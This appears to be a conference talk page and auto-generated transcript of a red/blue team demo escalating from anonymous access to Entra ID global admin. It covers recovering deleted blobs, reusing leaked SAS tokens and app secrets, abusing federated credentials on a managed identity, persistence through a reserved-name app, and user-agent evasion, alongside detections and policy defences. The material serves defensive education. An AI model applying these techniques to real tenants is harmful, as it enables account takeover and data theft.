← All talks

From anonymous user to GA

BSides Limburg · 202657:2626 viewsPublished 2026-04Watch on YouTube ↗
Speakers
Tags
CategoryTechnical
TeamRed
StyleDemo
About this talk
In this demo heavy session Rogier and Stefan will show an escalation path from an anonymous user to global admin, moving laterally from Azure to GitHub and end in Entra ID. www.bsides-limburg.be
Show transcript [en]

We are going to talk about from anonymous use to global admin within 45 minutes. Um I think we need to thank our sponsors. So please all say thank you otherwise we won't continue. So all right we're not going to continue. Who do you reckon? Thank you. I heard one. Okay, that's good enough. Um, who am I? Um, Roger Dykeman. I'm a cyber security architect. I'm working at Rubicon Cloud Advisor, which is a Dutch consultancy company. Um, I'm a Microsoft security MVP for about three years now, both security and identity. So, even Microsoft thinks I know something about security and identities, which is fun. Uh, next to that, I'm a cloud security researcher. So, I do a lot of research

against cloud environments. um mainly Entra and um what's your other crappy platform again? 365 Azure. Thank you. >> Very safe out of the box by the >> um Stefan Smith. Um been working with Rubicon Cloud Advisors for two years now. Just like we're here, we've been working together for way longer than that. Uh and yeah, we do talks more often than this, but mostly at our own company for our own colleagues. uh and I got the opportunity and invitation from Rahier to speak here as well. So thanks um cyber security architect uh doing that for a couple years now really enjoy the work and I'm mostly focused on the blue side of things so blue teaming and

he's more on the red teaming side of things and that's also how we're going to do this session so we'll alternate between him attacking an environment walking you through that it will be very demo heavy so we'll show you a lot of commands and data that's coming in um and then we'll switch to the defending side, show you how things are detected or are not detected. Um, and then we'll go from there and then we'll walk through an entire attack chain. And that's how we're going to start. Um, first up, this is a website that was made. It's fictitious, but it does exist. Um, you can visit the website if you want to book uh tickets for a flight. You can

also do that because there's an API behind that. You can do it. Be a little bit smart about it because this guy is watching. >> I had some people that went to this website, booked the flight, filled in the passport numbers, and then I need to send them an email. Luckily, they filled in their proper email address. Like, it's not a booking site, it's a fishing site. So, what shall I do with your credentials? They didn't answer, but I removed the data. Most of it. >> Yeah. >> Um, yeah. More about it later. >> Yeah, more about later. Um that more about this website later. We'll end on this. Um we'll give you a little

challenge. Um that's where I'll end it for now. Um the company Blue Mountain Travel is like I said, it's a fictitious company. We've done quite a few migrations from customers to new cloud environments. And this UK based travel agency wants to move to a cloudnative uh environment completely transitioning but along the way they make some costly mistakes and we're going to show you those uh we're going to expose the mistakes they made and we're going to use some of the data that we have will gain access to um to compromise their environment and go from anonymous user so the reconnaissance stages all the way up to global admin and to full compromise. of the environment

hopefully >> uh if the demo gods are with us because like I said it's a very demoheavy session. The internet wasn't working quite well so we're on a hot spot now. So let's hope that everything goes well. Um for the protection side of things uh we'll be using a couple of the defender products and uh Entra. I'll walk you through those once we get to the demos. Um it will be mostly Defender XTR related, some Defender for Cloud, um Sentinel custom analytic rules, um and you can see some of the lock sources that we'll be using uh for those analytic rules today. Obviously, there's a lot more that we can do additional to what we're showing today. We're well

aware of that. Um if you have any questions regarding possible additions to the session, write them down. uh we'll try to do it in 45 minutes and that leaves us with about 15 minutes for questions. So let's see where we end up and then I'll hand it over to >> man. All right. Uh if you guys is not familiar with Azure and >> great >> who calls himself an expert. >> Just one question for is the guy with the yellow shirt. So if you ask a question and it's not a smart question, uh let me know. Okay. Um the attack chain we're going to follow a attack chain based in the micro attack framework. Uh we start with a

reconnaissance phase and the collection phase. So the two phases each time. Uh after that Stefan will explain how you can remediate it, protect it and detect it. After that we will go into initial access and discovery of an environment. Discovery means you're going to look around as a hopefully authenticated user. depends on my gods. Um then we are going to try to create persistence within a environment. Um and hopefully we can escalate ourselves to a global admin well within um what's now 35 minutes approximately. >> Yeah. >> Damn. Thanks for the long intro. >> 40 40 minutes before we hurry up. >> Good. Um phase one and phase two. So the first phase we're going to start

with is the reconnaissance and collection. And we've put the techniques under it. Oh, I can see it there also. Cool. Um, T1589. You don't need to remember something with T15. I always forget them. Uh, what we're going to use today is project black hat. Maybe some of you have already heard of it, maybe you didn't. Uh, black hat is a PowerShell module that I've developed for pentesting Azure and Android. Uh, you can use as a blue teamer, as a red teamer, a purple teamer, um, or just as a malicious insider or somebody who wants to have fun in the weekend. But it's all good. Um, it's powerful. Um, and why did I create a new PowerShell

module? There are a lot of modules out there, but a lot of them are outdated, using old APIs and stuff and are easy detectable. They've got well-known signatures. They're using old API endpoints or they use endpoints that are really noisy. So, I tried to use actually APIs that Microsoft use internally. So, we're using the batch API in the back end of Azure because it seems like normal behavior. Um, and we don't need to enumerate to all subscription. We can do it at tenant root level. Same for Entraum. Um, but I'll show you about that a bit more. I hope you So, let's go to the live demo. Terminal. Yeah. Okay. Um, as said, it's a heavy um demo, heavy session. So,

sometimes it goes well, sometimes it goes wrong. We were recording a YouTube video on Monday and Azure and the graph broke down and then we had some kind of challenge. Okay. So, first phase when you do reconnaissance um in this case and hopefully it will paste it. Yeah, we're going to find for a DNS record. Look for DNS records. So, we know Blue Mountain Travel. UK has got a website, but we haven't got a clue where this website is running. So, the first phase is do some recon where the site can be. Um as you can see here, um it outputs a MS record. So there's a TST record that starts with MS is MS which

is a good indication for us that they are probably using a Microsoft environment because they need to validate that the owner um of the um domain that they have attached to this environment. So that's already good to know. So the second step that you want to execute here and I'm looking at my tablet because I'm trying to copy paste some of my commands. Where are you? There we are. Okay. So the second phase would be to do a reconnaissance on all the Azure resources that I have publicly exposed. Um maybe you guys don't know, maybe you do. Uh here we are. But if you deploy a Azure resource like a storage account, a function app, a static web app, and

several others, they've got a public endpoint because they need to be public resolvable. Like a storage account, you want to store something in a data center and you want to retrieve it remotely. So it needs an endpoint. Even if that resource has got a private link to it, it's FNET integrated, it's still resolvable. Um, not always on a record, but on a C record, you will find it. So, that's good to know. If you have an exam, if it's um privately linked, uh, you can still resolve it. The same command. Is this same command? Yeah, it's the same command. Thank you. That's why we do it together. I make a lot of mistakes in general. Um so instead of

now um trying to resolve all the public IP addresses of all the resources, we're just going to assume that they are probably using a uh storage account. Here we are pasting in the U. Hey, you see it's it's not okay. It's going to be a typing session.

I started using a MacBook about a year ago. Sometimes I love it. Sometimes you regret it. You can guess what moment this is. Probably love it. >> You'll love it. Yeah. That's a funny thing. I've attached my tablet. Here we are. Come on. Come on. To my MacBook. I'm trying to get Yay. Here we go. Okay. Um, paste. That's a bit better one. Okay. So, we're going to look for any public storage accounts that are deployed in the environment because if we do all resources, it can take very long. There's a dictionary in the script that's trying to add a prefix and a suffix to the name of the organization. In this case, Blue Mountain Travel and

it will give a shitload of results. So, we just did a storage account now for sake of speed because I only got 45 minutes. Somebody told me. So this will take a couple of seconds and it will look at combinations uh of Blue Mountain Travel and see if it resolves any storage account. This is one of those moments that you hope that your internet is still working. I think it is. Here we are. Yay. Okay. So what we can see here is that the storage account blue mountain travel.sa SA which is a well-known suffix being added to resource in Azure uh is publicly available and it's got a folder in there um which is called

templates but it says well file counter zero so well it's not very useful to look an empty folder the fun thing about this is Microsoft is not really good at cleaning up old APIs and now the functions use a new API but what you can do is if you call the old API um oh no it's the same command You can say um include um empty folders and you can say include deleted items. So what we are going to do delete include delete I said tap. It's a great module. It always works as you can see. Include deleted. deleted. Doesn't make sense. >> Oh, okay. We're going to try another command. Um, here we go. Are you ready, guys?

>> Okay. Get public blob content. Here we go. What we can do other command um is we're going to open up the storage account again. Storage account, which is the blue mountain travel. We say we want to look into the container name template, which is the empty container. what we are going to call the old API to see if there are any deleted files in there. So if you use the old API, Microsoft suddenly shows you as an anonymous user that there are deleted files in the storage container which is publicly accessible. Well, that is fun. And in this case, we see that we've got an onboarding email uh in there. So you probably already can guess it what we're

going to do. We can see if we can download this file. So we add the fleck download and I add a file path loot. And now the file is in my loot folder. So let's go to CD loot. It's in here. And we can see here that there's an onboarding email. So we do an invoke item which is PowerShell command. Uh and we're going to onboard. Here we go. And now it opens up with my other other Mac screen. Simply lovely. Here we go. So what we can see here is that as an anonymous user, we were able to download a file from a storage account which is probably being exposed which is really interesting because

normal user would think well I've deleted the file so it's gone. Uh well that's not not always the case if you use the old APIs. Um looking at this email um we can see it's a template email for probably new hires. So it's got a placeholder in there for the first name. We see the several links in are in there. Another good indication is that there's probably a docs folder within the storage account. Um, and the naming is like the first name and last name of all the us that are in there, which gives us a good hunch that they've got more data within Azure and within the storage account. So, let's see if we can

get more information out of that. Um, so for you guys, how would you get more information out of Azure as an authenticated user without having credentials of a user? Nobody. That was your bottle. I think you was going to be careful with that because next time you have to say something. Okay. Uh, I'm not sure if you guys can read it, but if I hover over this link, uh, come on, please. Yeah. Is this readable for you guys? Is it readable over there? Okay. Um, you see that there's a long URI in here. We'll also open up in the terminal in a minute, which got a SAS token in there. All know what a SAS token is? Security X token.

Okay. A SES token is a generated token by Azure which authenticates for not a user but just for a system or an object. So if you add it to your link, you can say I want to download this file or see this file based on the token that's valid for an X period from a specific IP address and read the content. A lot of people don't understand that and just generate a SAS token with defaults and then it'sly available for two years and get permission anything in the storage account which is great for us. Uh let's close file and go back to the terminal. Here we go. So what's the next thing we are going to

do? Uh we're going to try to get the test token out of this file and see if we can use that um to see what permissions it has and then see if we can authenticate with that. So we do the info item get content. Here we go. Apple C. I'm hopefully not getting the same command as the previous six times. Yes, of course I do. Can we tell a good joke? >> I don't have one. >> Well, that was one. >> All right. Um, get content. And what we want to see was the content of that welcoming onboarding email, right? Onboarding email. It's okay. Get content. So if we look in here uh we see

up here that there is a very long value. So this is the name of the storage account. It's a files link. We see the first name the last name to the welcoming email and at this part the SAS token starts. So the SV that's an indication it's a SAS token and provided this parameter to this URI. That's still understandable, right? So what we can do and I was um grabbing the test token here. Yeah. Yep. Okay. So, what we'll do, we we pull out the test token. We pull out the storage account name and the docs file. That's what I'm going to do right now. And hopefully this is going to copy. Copying. Copying. Go

back to the terminal. Terminal. Just going to clear the terminal. Yay. Now it works. So, I've got the storage account name here provided as a parameter within PowerShell. Um, we've added a file share named docs like we've seen in the onboarding email. There probably more files in there and we provided the SAS token. So, what we can do now uh now that we have the authentication token is see what's in that um file storage as an authenticated user. So, here we go. And now we suddenly see that there are several user folders in there. So, we've got Bridget Jones in there. We've got Bruce Banner in there. Some other very famous names. Maybe you know them, maybe you don't.

Um, so that's already interesting. And now we can go into these folders and download the files that are in there. There are two interesting things. We see the user folders. So probably got some more user information in there. And we've got a config folder, which hopefully also has some configuration files in there. Um, now I'm going to scroll down to the next command, which is not my screen to do. I lost my command screen. That's fun. Here we go. Any questions so far? No questions at all. Okay. >> Okay. >> I've created a B sites file. So for all for all of the things that DI is showing just now, we'll switch to the blue teaming side in a second. Uh one of

the things that you'll see is that um for the reconnaissance phase uh there's quite a few things that you can do um such as using defender for cloud uh to enable it on storage accounts which is called uh defender for storage and if you enable that you are able to see uh publicly accessible storage accounts being accessed by an anonymous users. Um that was the first stage that he showed. I'll show it in a slide in a second how you can enable it. Uh and what what what kind of incident comes out of that. And um same goes for collecting the file afterwards or reading from that public storage. Um that's not actually something that's natively detected

even though something like that should probably be natively detected. And there's a lot of those things that are uh that you can do as an anonymous user that are not natively detected. And the the goal of this presentation is to show you that uh with just the standard implementation of the Microsoft stack, it's not going to cut it uh for the the environment. It's simply not safe enough. You ready to go? >> Yep. I said I didn't pay enough to my demo gods because the internet connection was dropping. We've got it back again. So that's good. File was not being updated. Um here we go. So we're going to paste in next value next command because

commands are a bit long. Um we do copy here. We go back to this screen. Where is the screen man?

It's crazy, isn't it? >> Yeah. >> You know, we're just going to extend the screen differently within a second. Um, or I'm just going to type. Here we are. >> Paste. >> Here we are. So what we are going to do now is to get the fileshare content of the folder Peter Parker um storage account the storage account name again the variable that we visited previously. We're going to look in the fileshare folder which is the docs folder and the path is Peter Parker. We're going to use the SAS token again and we're also going to download the files. So what you will see now is these are the files that we can download with the SAS token. It's

the authenticated user. We were not able to see this as the anonymous user but because we have the SAS token we can get these files out. Um we can do the same um for the config folder that's in there. Uh remember we've seen the config folder. Okay. So let's go back and remove this space config folder. And what we see here in the config folder is that there's a app config.back file. So apparently they've used this environment um to configure anything to deploy anything. Um put a back file in there. I thought, well, it's all in a authenticated folder, so nobody's going to find it. Uh, well, guess what? We were just able to get it out. Um, so

this is where I give it to you and we'll go back to PowerPoint slides because we were able to excfiltrate data as an anonymous user and based on that information, we went to the next phase and get some more files out of there. >> All right, thanks. Um, like I said just now, one of the simplest things that you can do within an Azure environment is enabling Defender for Cloud. Um, having it enabled will result in what you see on the screen right now, the publicly accessible storage um, yeah container has been exposed. So it it'll scan your storage accounts to see whether they are exposed to the internet. And that's one of the first indications you'll get. The

moment you see this, you can act on it. Meaning that if you act on it, the entire thing we're presenting today will be a lot harder or simply will be impossible. That's the first thing. Um then let me have a look. Here we go. Custom detections for storage. Um um >> yeah, it's an interesting one. Um so what it says for a custom detection based on a storage account to validate that we downloaded any files we need to set the storage account diagnostics which is not on by default. If you deploy any resource within Azure it doesn't log to log analytics or if you've got defender for cloud it does some detections but it doesn't detect a

lot. So you really need to go into the settings. I'm not sure if that's the next screen where you can conf configure it. >> I think so. >> Oh yeah there it is. Uh so I need to go into the um activity log settings where you explicitly need to say we want to forward the read, write and delete uh actions on a storage account and send it to a log analytic workspace. In this case, Microsoft Sentinel is deployed. Are you familiar with Microsoft Sentinel security product? Yeah, cool. Well, that's where the data goes. Then you've got the data there, but you just have the data. You still need some detection analytics. I think that's where you can

pick it up. >> Yeah. Thanks. Um so once you have all of the data then um clearly you can use that data to write KQL queries or crystal query language queries um in order to break down that data and pick up the data that you want to show inside of an incident for example. So suspicious behavior is very much detectable in regards to the attack that just showed. Um in addition to that um RA has just shown that the anonymous enumeration uh on a storage account and yet again um doing anonymous enumeration on storage accounts be it multiple storage accounts or a single one all of this is detectable from the data um and lastly to complete I think it's

the completion of um what he just showed Um, you can also see the successful collection and download of the file. Not entirely happy with the naming of the the incident, but that's just what it is for now. Um, but you can again you can detect all of this stuff and the moment you detect all of these steps with each step you can attach automation to interact or to stop the attack. Um, I'll skip the demo because of the time. >> I got 45 minutes. Yeah, >> I know. >> I was [ __ ] around, so it took a bit longer. >> All right, let's go to prevention. Um, within Azure, it's possible to configure Azure policies. These are your guard

rails. You can deny the configuration of public access on a storage card. You can do that. Um, sure in some cases you might want some of your stuff to be publicly accessible but you can always work with exemptions. So at least you'll have some governance in place uh to manage whether something is publicly exposed or not. Uh and this by creating a deny policy for example or at the very least an audit policy so you can see that it's publicly exposed. Um yeah, you can make your environment a lot more safe. Uh in addition to enabling defender for cloud, you'll also get security recommendations. Security recommendations is basically the scanning of your resources within an

environment. And um yeah, in this case, we're focusing on Defender for Storage, which is a product within Defender for Cloud. Um and there's a lot of recommendations that can come out of that if you have a poor configuration. So at least you'll be able to see what you're doing or what someone else has been doing if they're making mistakes. And lastly, um supposedly there's supposed to be secret scanning on files that are stored within your storage accounts, but it does not work properly. >> Yeah. So based on the information that's in the files in the Azure infrastructure, um like an application ID, a tenant ID, and some secrets, um Microsoft should be able to scan the

data and flag an alert like, hey, I found some sensitive data. It's in a storage account container, which isn't right. And the freaking container is even publicly exposable. Um so they created a product called sensitive data. It doesn't flag it, so it doesn't work. Uh, so you can pay $10 per month. Um, but don't pay it for this. Uh, we've opened up a ticket with Microsoft about I think about six weeks ago. Um, we got a confirmation that we've opened the tickets and we're still waiting for a response. They're going to fix it or not or remove the product or I don't know what it is. Um, it also works for the other files. So, if you remember, we

also got a file downloader from Peter Parker. It's got an email address in there and a default password. the password that was in there if you all u took attention of it is actually valid it works and even that is not being scanned by Microsoft if you put a password somewhere on GitHub Microsoft security scanning that will fetch it that's okay but if as long as you have in our own infrastructure they're probably not able to detect it so great product it's got great potential um I've put a lot of time of effort in it but um I think it needs some work go ahead Um, so we've got two files. We've got the file of Peter Parker,

email address with credentials, and we've got the application secrets. I didn't show the content of the app secret, but there is an application ID and application secret in there. Show you in a bit to the questions. Are we going to follow the attack path using the app secrets or the user credentials? >> Yeah, >> apps. Hands up for apps. >> Okay, that's very clear. >> Hands up for users. >> Just one. I'm sorry you lost. >> Yay, they lost. All right. Um, well, anyways, didn't remember how we were going to vote this because if you all said user credentials, nobody's looking back around. So, we we're going to go for app secrets anyway. Here we go. Um, phase three and four.

Um, we're going to do the initial access and we're going to do discovery. So, like we just said, we found the credentials in the app registration files, app credential files. and you did Peter the Parker files or Bridget Jones or the one that you like. If you like to cry in chocolate, you need to watch Bridget Jones but that's a different session. Um we are now going to use the credential that we found which is going to be the initial access phase and we're going to do discovery where going going to see if we can use the credentials to enumerate resources within either Azure or in Entra. Um, please pray again with me again or

just stamp your feet on the ground so all the demo gods will be happy and hopefully copy pasting is going to work a lot better now. All right, you all want to go let it go wrong. Nobody's clapping. Okay, back to the tablet. Um, so the next phase that we're going to do is do you first want to see the content? By the way, it's a config file because I want to authenticate with the credentials, but maybe it's fair to show you that it's in there. Okay. >> Um, get content uh, and it was the config folder. I thought it was in the config folder, right? Yeah. CD config. As you can see, I'm an old Windows user.

I still use CD, but we get content content and that's app secret file. So, if we look into this configuration file, you can see there's a tenant ID in there. There's a subscription ID in there, uh client ID and client secret. That's what you can use to authenticate. Yes, these are valid. Um, please don't take any pictures and try to abuse it because I will find you based on your IP address. Um, and we've got some other interesting information in here. Um, what is also interesting to see is that it's probably for a app for the don't take a freaking photo st. >> All right. He's driving a Jaguar Cabriolet. So, >> if somebody screws at the session,

that's his car. >> Let's not make threats. Um, they are probably using this for some kind of a HR application because it's got an app service app HR portal pro in there. So, that's going to be fun. We are going to use these credentials now to uh login um in the other screen. Here we go. Clear. >> Yeah, we still got about 15 minutes. So, I'm not sure if we're going to make it within those 15 minutes. Do you guys mind if we stretch it for five minutes? No. Okay. Thank you. Yes. Clear. It's because you didn't clap for the demo gods. You know that. Otherwise, we did it. Uh, all right. We're going to copy copy

the commands. Uh, these are the credentials that we're going to use. Uh, here we go. Where's my mouse? There it is. Um, so we're pasting in the credentials and we use the blackhead function connect serves principle with the parameter we set previously. Um it takes a couple of seconds and now we are authenticated as the HR legacy deployment. So these are the credentials we found within the app config file which is interesting because now we probably can do something with the HR application credential that we've just found. And by the way you just took a picture that was the wrong credential. This is the right credential. >> Okay. >> Somebody abused it in a previous

session. So I think I need to change for that. So what would you guys do if you got credentials for an environment? What's the first thing that you're going to do with those credentials? Anyone? You would go and see what kind of permissions these credentials have. So we use the function get RO assignments. This is one of the functions within black cap because this tenant level with the um get RO assignments. We enumerate all the permissions for the specific user within a tenant. I've ran this with a very big insurance company that had about 200 subscriptions and about 30,000 identities that had RO assignment. That took about 2 minutes to get every assignment within an environment. Um, in

this case, we see we are authenticated with the service principle. That's correct. We just use it above here. And we can see that this account has contributor permissions on a subscription. That makes it interesting because because I'm a contributor, I'm able to modify any resource within the scope. either the subscription or in the resource group. So what we want to do now is see if we can get like anything like manage identities. You all know what a manage identity is. Yeah. Okay. For the ones that don't know u usually you use app credential where you need a client ID and a client secret or something like a password and like in the previous session that you've seen of

SERS great session by the way we are trying to avoid to use passwords. So Microsoft came with a great ID. Let's skip passwords and we can use certificates or federated credentials. We've got two types of federated credentials. One is system assigned. The other one is user assigned. System assigned credit u manage identities are attached to a resource. If I deploy a virtual machine within Azure and I want to get some secrets from a fold, a key fold, we say that the identity of the virtual machine is allowed to get the secrets from the key fold. That works fine. You only need to configure rolebased access one time. But if you throw away the virtual machine and you

create a new virtual machine by infrastructurees code, you're not able to get into the default anymore because it's got new identity. Then they came with a great ID. Let's use user assign manage identities because you can attach it to the resource to the virtual machine. You drop the virtual machine, deploy the virtual machine, attach the user assigned credentials and you still have access to the default. Um, one of the other great things in that is that we can use federated credentials. Um no. >> Yeah, you met there. >> I'm there. >> Here we are. Okay. Um, federated credentials in is another great part um within a user sign manage identity um because then you say well I've got a

identity and we want to deployment from GitHub but we don't want to store those secrets of a identity in GitHub. Zoe is a federation. We say, well, this GitHub repo on this GitHub organization, we're going to trust. So, if we request a token from Entra, yeah, we've got a trust. That's all fine with me. So, what we're going to do now, and is I did Oh, that's not this command. Let's clear it up. And this is a longer command. We got an ID in there. Copy. We're going to see what the permissions of this user sign manage identity is. So here we go. So the user sign manage identity has got read write permissions all application

read all um and it's got group read all and user read write all which is a lot of permissions. So what if we were able to authenticate as a user sign manage identity would be fun right? Well that makes it a bit more difficult. um because we need to attach it to a resource but we won't don't want to create new resources within Azure because we're going to make a lot of noise then and then it probably will know that we do some uh resource uh creation and now the detection goes off and a lot of other things that we don't want to do. Oh wrong command uh Ctrl C clear. So what we are going to do first

is see if this uh user sign manage identity that they are using is actually using a federated endpoint. So what we'll do we said get federates identity credential for this user sign manage identity. Hit enter. Pray for the gods. Here we go. And say yep I found it. And the federate credential that's on here is the blue mountain travel HR onboarding portal. So this is the GitHub organization. This is the GitHub repo. and it trusts the main branch of the repo. So if I do a deployment from there, it will work. Um then I came with the idea like okay that's interesting but how do federate credentials actually work uh within Android and the thing that I'm going to

show you guys now is pretty new. I think I've released the proof of concept. This it is two weeks ago somewhere. Okay. >> So as said you need to create a federated endpoint to trust a federated endpoint which is either GitHub or Azure DevOps or or anything else. But if you look at the authentication process uh you add a federated endpoint and it will look at a well-known endpoint. uh it's wellnown within there is a file that explains what kind of environment you're trying to connect to. So what I did I created a storage account in my own tenant within that storage account I've create a place a self-signed certificate and I've created a well-known file. The

fun thing about that is Microsoft is not validating a chain of trust of certificates. So what I can do now uh this is the wrong why is it not um is run my function invoke federate token exchange and we will temporarily add a storage account as a federated endpoint and see if we can dump the credentials of that user sign manage identity. Okay you guys still follow me? Yeah. Okay. So invoke federated credential token. We hit enter. We hit enter. I said now we wait for a couple of seconds. It will now add the storage account as the federated endpoint. There it's done. And what we call back is a access token. This is the bearer token JSON web token

of a user assigned menace identity without attaching it to any resource. According to Microsoft, this shouldn't be possible. Oh, as you guys can see, we can do it. So, if you remember correctly, we logged in with an app registration. that app registration had contributor permissions on a resource within Azure. What we've did now was modified that resource because we're contributor added an endpoint to it and got the credentials of that identity. So now we can try to see if we can log in with the new account. Um but to do that we first need to go to run this again. Yep. My partner just said we have only 10 minutes left. So, we're going to extend the session

with about 10 minutes. Nobody complains. >> No uh room for questions. Uh I guess okay, we're going to run it again. I'm just going to put the token in a variable. Otherwise, I need to copy paste it value there. Uh and I think we're not going to make it within 45 minutes. We're going to make a going to be a global admin within 55 minutes, which is still fun. Okay, we've got the token, the bearer token uh placed in a variable. We're going to paste it and we say, okay, want to connect with a bearer token right now. Here we are. And we are now authenticated as a user assigned managed identity against the graph, but we're

still not a global admin. Correct. Do you want to say something about this? You're >> definitely correct. We haven't added these permissions yet. However, we are capable of adding them now. And this is what will show you now. >> So, um we had the app role assignment permissions in the user assign manage identity as you remember. Uh this is a Oh, where's my terminal? Come on. >> It's on the side. >> Where is my terminal? There it is. Okay. Uh it had app role assignment permissions which actually means that this user assignment is identity can assign permissions to other objects within entra um including itself. So what we will do we provide the um UID

of that user manage identity. Now go back to this screen again. Here we go. Thank you. Uh and we're going to set the manage identity permissions. A managed identity can have permissions on um Azure. You can configure that to role-based access control and it can have permissions on um entra. Uh but that you need to do through the API laces I am. I've created a function for that and paste. Nope. Control C. Come on. >> I think the only thing you're going to remember at the end of this session is like the amount of fuckups that I made, right? >> Language. Oh, language >> requirement. >> Oh, okay. Two things. Language. >> Yes. >> And copy paste mistakes.

>> Here we go. Oh, here. Yeah. Okay. Here. Paste it. So, we're going to assign application readr all to the user assignments manage identity. >> Yeah. Fine. >> It's already got those permissions and do it again. >> Yeah, we might have added those permissions earlier. Yep. >> We've been demoing the entire morning to get this to work properly. >> And now we're going to do it again.

>> How much did you pay to the demo god? >> Not enough. >> I don't know. All right. Here we go. Paste it. Paste it. It's probably going to same give the same error. Let's see. >> Yeah, same error. Okay, never mind. permissions were already granted. Normally speaking, we would use the current permissions that that it has to assign these permissions because we can do that because we have access to everything now. Um >> yeah. >> Yep. Go ahead. I think we're going into the blue teaming part from here. >> Yeah. >> Um here we go. >> Take it away.

>> Okay. Cool. Yeah. Yeah. >> All right. So, um I'll let you talk about this. >> Yeah. So, the app roll assignment readwrite all permissions that we just added. We've got 15. No, we got 20 minutes. We got 5 minutes longer. No. Okay. [ __ ] Language. Um app roll assignment readwrite all. This gives us the permission to add ro assignments to other applications. So, we can add permissions to other applications and our own application. So if you see that as an indication they've got a critical vulnerability within environment. Yeah, take that into account. >> All right. Um again detections um the unauthorized addition of federated credentials to a managed identity. You can detect those if you

have the logs. Um might be worth doing that considering how easy it is to compromise user assigned managed identity. Um the detection is no rocket science. It's uh it's also publicly available uh through I think it's >> kqlarch.com. >> Um it's been uploaded there. Um definitely worth considering especially because the back file that he used was coming from a public storage account that was not inside of the same tenant. It was inside of an other tenant. So there's no trust there or whatever. It's very easy to add a federated credential and to compromise your SSI managed identity at this moment. Um in addition uh very valuable logs uh is to ingest the um subscription level Azure activity

logs um because you can see all of the uh enumeration activities on resources within the subscription. Um and this is one of the most important things I believe uh when you have subscriptions and you have resources in them. Uh having or being able to see enumeration on those resource and be a be being able to detect those um will give you the opportunity again to step in and to stop someone from doing that by implementing automation. Um this is a detection that was created in order to detect an interactive sign in from a service print from a new country. Normally speaking having interactive signins from a service principle is something you by definition don't want to see. You can also detect

that act on it. Interactive signin shouldn't happen. It should normally speaking always be non-interactive signance on a service principle. Um but we decided to add this because while doing the attacks we're using a VPN so we're by definition coming from a new country so the detection triggers um want to take this one >> um yeah so one of the things that we do is that we enumerate permissions of service principle which isn't normal behavior within environment so we've created a detection rule for that if a identity uh which is not a user identity is trying to enumerate permissions of another identity which is not human. Uh we flag an alert. So basically you know somebody tried to log in

non-interactively and try to get information about your environment. >> Yeah. >> Uh in addition it's also possible to detect which tools are being used. Uh in this case there's a pattern that the blackout tool uses that's detectable um I believe it's the signing logs um uh and for many tools uh that you get from GitHub or whatever they use for example user agents that say a certain thing or have a certain pattern you can detect on that however as we all know it's very easy to change that and to then evade the detection just as this. Yeah, we've got a function for that called set user agent and you can it will enumerate for different user agents and just pick one.

>> Yeah. >> Or you can set your own. >> In this case, we used the user agent blackout so it's very easy to detect. But he's already built in a function. So something like this goes undetected. All right. Um conditional access. Um also very interesting. You can use conditional access policies. You're probably familiar with that where you can restrict the country from where you're going to log in or the device you're going to log in. The other thing that you have is workload identities. It's not a based on a device or a user, but it's based on a service principle or an app registration. All works great in that context except for manage identities. So it it's good to prevent it for app

registrations. You can't use it for user assigned management identities and system uh assigned men's identities because Microsoft believes you are only going to use that from within their own infrastructure. But as you can see now we've got a bearer token and can login from anywhere with a token of that identity. There we go. Uh again um applying Azure policies allows you to limit the federated credential assignments and even allow allows you to limit uh those who can assign federated credentials. I'd say put it in place govern who is able to perform such actions. Yeah. Uh it's the same slide. Um >> yeah, not much about this. Uh there are several screens. Let's skip this one.

There's a couple of screens. These are very useful things, but we'll skip them for now because of time. >> All right. Phase five. >> Yeah. So, we only had a little issue with um setting the permissions on the identity. So, please pray with me again. Here we go. Clear the screen. Clear the screen. Okay. Um, so after we have set the Are we here? Yeah. Okay. Copy it again. I'm just going to quickly see if this going to work. Um, didn't paste. Nope, didn't paste. There we go. We are going to authenticate again with the service principle because usually we were logged in as the user sign manage identity using it token. um but that

doesn't have permissions on a resource. So we need to get a new bar token again because we've added that permissions. So we need to log in again with the service principle you had previously from that config file to be able to set the new federate credential and get the data out of there. So we paste it in here. Yep. So we are logged in with the legacy application again. What we'll do now is go and fetch a new token uh using the storage account. We go copy and we're going to paste it in here. So that's now again in my token variable. We just did that and we're going to connect with that variable SC users admin identity

again with the new permissions. It does share a display name so I'm hopefully it's going to work. So the next step that we can do now because with all those permissions added we were adding um application read write off for an example we're able to create a new application within Entra um that's not this one um control C clear so we're going to use the function add entra application and I'm hoping that this is going to work because of setting permissions issue previously And in this case, we're going to call it MSPIM. Um, okay. Unauthorized. Something went wrong. Unfortunately, we're not going to fix it now. Um, I will talk you through it. There is a blog article which

describes the full text story that actually works. Um, probably made some copy paste mistakes in my prom book here, but that's okay. So, what we doing? We creating a app registration called MS PIM. Why MS PIM? Uh, because everybody trusts it. And if you try to create a application with an entre that's called MSPIM or one of the other internal ones, it will block access because it's will say it's a reserved name. If you do through the API, it's not blocked. The fun thing about this is now we have an MSPIM application within Entra with the global admin permissions assigned. Nobody's going to throw that away because they're all afraid of throwing away the MSP application because then

the application will break. Um why global administrator? Because if it's a global administrator, it will be able to assign roles to other users and groups, which is also interesting. And what will happen if you now log in with the MSPIM application ID and application secret and you will set permissions on a user or a group, the sock will think, oh, that's all fine because MSPIM assigned these permissions. So it all falls within the normal pattern of an application. And that's how you get foothold uh within environment and are able to escalate your privileges. >> Yeah. So for those red teamers under us, if you ever want to go unnoticed, create an application via the API that

has a res supposedly reserved name. It's possible. So, and I don't think this is going to work also. Or we can just check it. Is this the right one? No, it's not. Okay. Unfortunately, we didn't make it this time within 45 minutes. So next time we do it in an hour including troubleshooting. What do you reckon? >> Yeah, let's do that or try. >> Yeah, also not the permissions. So you see you would create a MSP application but you just get the application within Entra. The second thing that you would do is add credentials and adding credentials actually the persistence because you've created an application you've got credentials yourself. You can use them somewhere externally and always

log in. So if the user sign manage identity get deleted or the app registration we privilege found got deleted we still know that we have a back door which is the MSP model one >> right >> um yeah so well we could show the slides now that we didn't make it so it's not game over today >> well it is for us >> normally speaking look all these steps that we've shown you can put them into a script and execute them very fast so this is obviously because We're doing it manually. It takes time and we have the room to mess up. Um, but once you did it inside of a script, you add some timers

in there too, so it waits for all of the stuff to propagate properly. The the environment can be compromised within seconds. As long as you've done your reconnaissance first, you've identified the possibilities, all of this is scriptable. And then it's just it's very easy to for the environment to get compromised and for it to be game over. Yeah, >> fun thing you can say, well, we've got PIM enabled because that's why we've got an M PIM application by default and PIM will send you an email once a RO is assigned. True. Um, if you have PIM, and the email takes about 5 minutes before it's being delivered, well, we've got a seam sock, we've got Microsoft Sentinel, which is

